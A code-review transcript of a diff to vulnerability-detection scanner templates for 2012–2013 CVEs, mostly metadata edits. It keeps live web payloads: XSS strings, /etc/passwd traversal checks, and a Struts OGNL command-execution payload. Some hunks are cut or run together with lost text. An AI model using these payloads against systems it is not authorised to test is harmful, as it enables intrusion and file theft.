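Review bot: The reference list in the CVE-2012-0896 info block gains two entries but keeps the malformed context line `- https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896`, whose doubled scheme makes the NVD link unusable; change it to `- https://nvd.nist.gov/vuln/detail/CVE-2012-0896`. The CVE-2012-0981 hunk further down has a related hygiene issue: `https://www.exploit-db.com/exploits/18435` and `http://www.exploit-db.com/exploits/18435` are the same page listed twice, so one of them can go. Both lists are touched by this commit, which makes it the natural place to fix them.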
@@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index a5333c715d..0402f52eb2 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -3,21 +3,25 @@ id: CVE-2012-0981 info: name: phpShowtime 2.0 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. reference: - https://www.exploit-db.com/exploits/18435 - https://nvd.nist.gov/vuln/detail/CVE-2012-0981 - - http://web.archive.org/web/20151016200610/http://secunia.com/advisories/47802/ - http://www.exploit-db.com/exploits/18435 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/72824 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-0981 cwe-id: CWE-22 - tags: phpshowtime,edb,cve,cve2012,lfi + epss-score: 0.05654 + cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kybernetika + product: phpshowtime + tags: phpshowtime,edb,cve,cve2012,lfi http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index d1dc8781fa..62c4c0e92d 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml 
@@ -3,21 +3,25 @@ id: CVE-2012-0991 info: name: OpenEMR 4.1 - Local File Inclusion author: daffainfo - severity: high + severity: low description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter. reference: - https://www.exploit-db.com/exploits/36650 - https://nvd.nist.gov/vuln/detail/CVE-2012-0991 - - http://web.archive.org/web/20210121221715/https://www.securityfocus.com/bid/51788/ - http://www.open-emr.org/wiki/index.php/OpenEMR_Patches + - https://exchange.xforce.ibmcloud.com/vulnerabilities/72914 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:P/I:N/A:N + cvss-score: 3.5 cve-id: CVE-2012-0991 - tags: lfi,openemr,traversal,edb,cve,cve2012 + cwe-id: CWE-22 + epss-score: 0.89208 + cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: openemr + product: openemr + tags: lfi,openemr,traversal,edb,cve,cve2012 http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 28c249b600..9a6a2f5af4 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -3,7 +3,7 @@ id: CVE-2012-0996 info: name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI) author: daffainfo - severity: high + severity: medium description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php. reference: - https://www.exploit-db.com/exploits/36784 
@@ -12,12 +12,16 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2012-0996 cwe-id: CWE-22 - cvss-score: 5.0 - tags: cve,cve2012,lfi,edb + epss-score: 0.01398 + cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:* metadata: max-request: 1 + vendor: 11in1 + product: 11in1 + tags: cve,cve2012,lfi,edb http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 62aab8bb73..34f2e69e0d 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -8,17 +8,22 @@ info: reference: - https://www.exploit-db.com/exploits/36873 - https://nvd.nist.gov/vuln/detail/CVE-2012-1226 - - http://web.archive.org/web/20210508221434/https://www.securityfocus.com/archive/1/521583 - http://www.vulnerability-lab.com/get_content.php?id=428 + - http://www.exploit-db.com/exploits/18480 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/73136 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2012-1226 cwe-id: CWE-22 - tags: cve,cve2012,lfi,dolibarr,traversal,edb + epss-score: 0.10469 + cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:* metadata: max-request: 1 + vendor: dolibarr + product: dolibarr_erp\/crm + tags: cve,cve2012,lfi,dolibarr,traversal,edb http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index ae15fd0446..2ca989ea68 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml 
@@ -3,7 +3,7 @@ id: CVE-2012-1823 info: name: PHP CGI v5.3.12/5.4.2 Remote Code Execution author: pikpikcu - severity: critical + severity: high description: | sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case. reference: @@ -11,14 +11,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2012-1823 - https://bugs.php.net/bug.php?id=61910 - http://www.php.net/ChangeLog-5.php#5.4.2 + - http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03360041 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2012-1823 - tags: cve2012,kev,vulhub,rce,php,cve + cwe-id: CWE-20 + epss-score: 0.97494 + cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: php + product: php + tags: cve2012,kev,vulhub,rce,php,cve http: - raw: diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 363202f83d..c1e5c44ee1 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml 
@@ -12,29 +12,33 @@ info: - https://www.htbridge.com/advisory/HTB23082 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2012-1835 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00229 + cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar" + vendor: timely + product: all-in-one_event_calendar tags: cve,cve2012,wordpress,xss,wp-plugin http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' - # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: 
word part: header diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 1e684d4be4..1d00465bd2 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -7,17 +7,22 @@ info: description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-2371 - - http://web.archive.org/web/20140805090129/http://secunia.com/advisories/49143/ - http://www.openwall.com/lists/oss-security/2012/05/15/12 - http://packetstormsecurity.org/files/112658/WordPress-WP-FaceThumb-Gallery-0.1-Cross-Site-Scripting.html + - http://wordpress.org/support/topic/plugin-wp-facethumb-reflected-xss-vulnerability-cwe-79 + - http://www.openwall.com/lists/oss-security/2012/05/16/1 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-2371 cwe-id: CWE-79 - tags: packetstorm,cve,cve2012,wordpress,xss,wp-plugin + epss-score: 0.00857 + cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mnt-tech + product: wp-facethumb + tags: packetstorm,cve,cve2012,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index b34d2bd37d..83f8ba0f8b 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml 
@@ -3,7 +3,7 @@ id: CVE-2012-3153 info: name: Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153) author: Sid Ahmed MALAOUI @ Realistic Security - severity: critical + severity: medium description: | An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown @@ -13,14 +13,19 @@ info: - https://www.exploit-db.com/exploits/31737 - https://www.oracle.com/security-alerts/cpuoct2012.html - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html + - http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N cvss-score: 6.4 cve-id: CVE-2012-3153 cwe-id: NVD-CWE-noinfo - tags: cve,cve2012,oracle,rce,edb + epss-score: 0.97048 + cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: oracle + product: fusion_middleware + tags: cve,cve2012,oracle,rce,edb http: - method: GET @@ -29,27 +34,29 @@ http: - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///" req-condition: true + matchers-condition: and matchers: - type: dsl dsl: - 'contains(body_1, "Reports Servlet")' - - type: status - status: - - 200 - - type: dsl dsl: - '!contains(body_2, "" - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index b0d038c2a2..008e4303f8 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml 
@@ -3,21 +3,26 @@ id: CVE-2012-4253 info: name: MySQLDumper 1.24.4 - Directory Traversal author: daffainfo - severity: high + severity: medium description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. reference: - https://www.exploit-db.com/exploits/37129 - https://nvd.nist.gov/vuln/detail/CVE-2012-4253 - http://packetstormsecurity.org/files/112304/MySQLDumper-1.24.4-LFI-XSS-CSRF-Code-Execution-Traversal.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/75286 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/75283 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2012-4253 cwe-id: CWE-22 - tags: packetstorm,cve,cve2012,lfi,edb + epss-score: 0.03411 + cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mysqldumper + product: mysqldumper + tags: packetstorm,cve,cve2012,lfi,edb http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 267808f18e..a8d9e9377e 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml 
@@ -10,14 +10,19 @@ info: - http://plugins.trac.wordpress.org/changeset?old_path=%2F2-click-socialmedia-buttons&old=532798&new_path=%2F2-click-socialmedia-buttons&new=532798 - http://wordpress.org/extend/plugins/2-click-socialmedia-buttons/changelog/ - http://packetstormsecurity.org/files/112615/WordPress-2-Click-Socialmedia-Buttons-Cross-Site-Scripting.html + - https://exchange.xforce.ibmcloud.com/vulnerabilities/75518 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4273 cwe-id: CWE-79 + epss-score: 0.00252 + cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" + vendor: ppfeufer + product: 2-click-social-media-buttons tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm http: @@ -28,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 1f99310ae9..2fcc5dfd37 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2012-4547 - http://awstats.sourceforge.net/docs/awstats_changelog.txt - http://openwall.com/lists/oss-security/2012/10/29/7 + - http://openwall.com/lists/oss-security/2012/10/26/1 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4547 cwe-id: CWE-79 - tags: cve,cve2012,xss,awstats,edb + epss-score: 0.0023 + cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: laurent_destailleur + product: awstats + tags: cve,cve2012,xss,awstats,edb http: - method: GET @@ -26,6 +31,7 @@ http: - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E' stop-at-first-match: true + matchers-condition: and matchers: - type: word 
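Review bot: The `+ matchers-condition: and` added after `stop-at-first-match: true` in CVE-2012-4547 changes the combination rule for a matchers list whose remaining entries are outside this hunk; nuclei treats an unspecified `matchers-condition` as `or`, so if the template has more than one matcher (a body word plus a status or header check, as the sibling XSS templates in this commit have) every one of them must now hit and previously positive results can turn negative. The same addition appears in CVE-2013-1965 and CVE-2013-2621 in later hunks. Please confirm against the full matchers list of each file that `and` is the intended semantics, or add a comment above the key, e.g. `# all matchers must hit: a reflected body string alone is not a finding`, so the tightening is visible to the next editor.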
diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 2c855ad445..b42ca9feec 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -9,14 +9,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2012-4768 - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html + - https://exchange.xforce.ibmcloud.com/vulnerabilities/78422 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4768 cwe-id: CWE-79 - tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress + epss-score: 0.00922 + cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: mikejolley + product: download_monitor + tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress http: - method: GET @@ -26,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index bfb9f16f6e..792e7901f4 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml 
@@ -3,21 +3,26 @@ id: CVE-2012-4878 info: name: FlatnuX CMS - Directory Traversal author: daffainfo - severity: high + severity: medium description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. reference: - https://www.exploit-db.com/exploits/37034 - https://nvd.nist.gov/vuln/detail/CVE-2012-4878 - http://www.vulnerability-lab.com/get_content.php?id=487 - http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.html + - https://exchange.xforce.ibmcloud.com/vulnerabilities/74568 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-4878 cwe-id: CWE-22 - tags: cve2012,lfi,traversal,edb,packetstorm,cve + epss-score: 0.01193 + cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: flatnux + product: flatnux + tags: cve2012,lfi,traversal,edb,packetstorm,cve http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 48f4378b05..90f92a0122 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml 
@@ -6,18 +6,22 @@ info: severity: medium description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. reference: - - http://web.archive.org/web/20210121082432/https://www.securityfocus.com/bid/52841/info - https://nvd.nist.gov/vuln/detail/CVE-2012-4889 - http://packetstormsecurity.org/files/111474/VL-437.txt - http://www.vulnerability-lab.com/get_content.php?id=437 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/74538 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4889 cwe-id: CWE-79 - tags: cve,cve2012,xss,manageengine,packetstorm + epss-score: 0.02518 + cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: manageengine + product: firewall_analyzer + tags: cve,cve2012,xss,manageengine,packetstorm http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 4f32e1b451..10c26ba029 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml 
@@ -3,21 +3,24 @@ id: CVE-2012-4940 info: name: Axigen Mail Server Filename Directory Traversal author: dhiyaneshDk - severity: high + severity: medium description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI. reference: - https://www.exploit-db.com/exploits/37996 - https://nvd.nist.gov/vuln/detail/CVE-2012-4940 - http://www.kb.cert.org/vuls/id/586556 - - http://web.archive.org/web/20210121232008/https://www.securityfocus.com/bid/56343/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N + cvss-score: 6.4 cve-id: CVE-2012-4940 cwe-id: CWE-22 - cvss-score: 6.4 - tags: edb,cve,cve2012,axigen,lfi,mail + epss-score: 0.06126 + cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: gecad + product: axigen_free_mail_server + tags: edb,cve,cve2012,axigen,lfi,mail http: - method: GET diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 0352e782ec..93039811cc 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -1,4 +1,5 @@ id: CVE-2012-4982 + info: name: Forescout CounterACT 6.3.4.1 - Open Redirect author: ctflearner 
@@ -9,14 +10,18 @@ info: - https://www.exploit-db.com/exploits/38062 - https://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html - https://nvd.nist.gov/vuln/detail/CVE-2012-4982 + - http://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-4982 cwe-id: CWE-20 + epss-score: 0.00748 cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: forescout + product: counteract tags: cve,cve2012,redirect,forescout,counteract http: diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index 5b2a70c3e3..f7419978b7 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -12,14 +12,17 @@ info: - http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/73403 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-5321 cwe-id: CWE-20 + epss-score: 0.02634 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"tiki wiki" + vendor: tiki + product: tikiwiki_cms\/groupware tags: cve,cve2012,redirect,tikiwiki,groupware http: diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index e8d3c9c96b..d40387d9be 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml 
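Review bot: The added reference `- http://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html` in CVE-2012-4982 duplicates the existing `- https://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html` two lines above, differing only in scheme; drop the new `http://` entry. While this block is open, the template name says `CounterACT 6.3.4.1` but the context line `cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:*` says 6.3.4.10 — one of the two looks like a typo and is worth checking against the advisory.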
@@ -10,14 +10,19 @@ info: - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/ - http://packetstormsecurity.org/files/111249/WordPress-Integrator-1.32-Cross-Site-Scripting.html - http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/74475 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-5913 cwe-id: CWE-79 - tags: cve2012,wordpress,xss,wp-plugin,packetstorm,cve + epss-score: 0.0029 + cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wordpress_integrator_project + product: wordpress_integrator + tags: cve2012,wordpress,xss,wp-plugin,packetstorm,cve http: - method: GET @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 1b8e9b0ad9..8a20e43727 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -11,13 +11,16 @@ info: - https://wordpress.org/plugins/age-verification - https://nvd.nist.gov/vuln/detail/CVE-2012-6499 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-6499 cwe-id: CWE-20 + epss-score: 0.01336 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: age_verification_project + product: age_verification tags: cve,cve2012,wordpress,wp,wp-plugin,redirect,age-verification http: diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 53e1babe64..f76fea5b8b 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml 
@@ -12,25 +12,30 @@ info: remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C + cvss-score: 9.3 cve-id: CVE-2013-1965 cwe-id: CWE-94 - cvss-score: 9.3 - tags: cve,cve2013,apache,rce,struts,ognl + epss-score: 0.00813 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve,cve2013,apache,rce,struts,ognl http: - method: POST path: - "{{BaseURL}}/user.action" - headers: - Content-Type: application/x-www-form-urlencoded + body: | name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index a77c398d2a..fd62f0d0f6 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml 
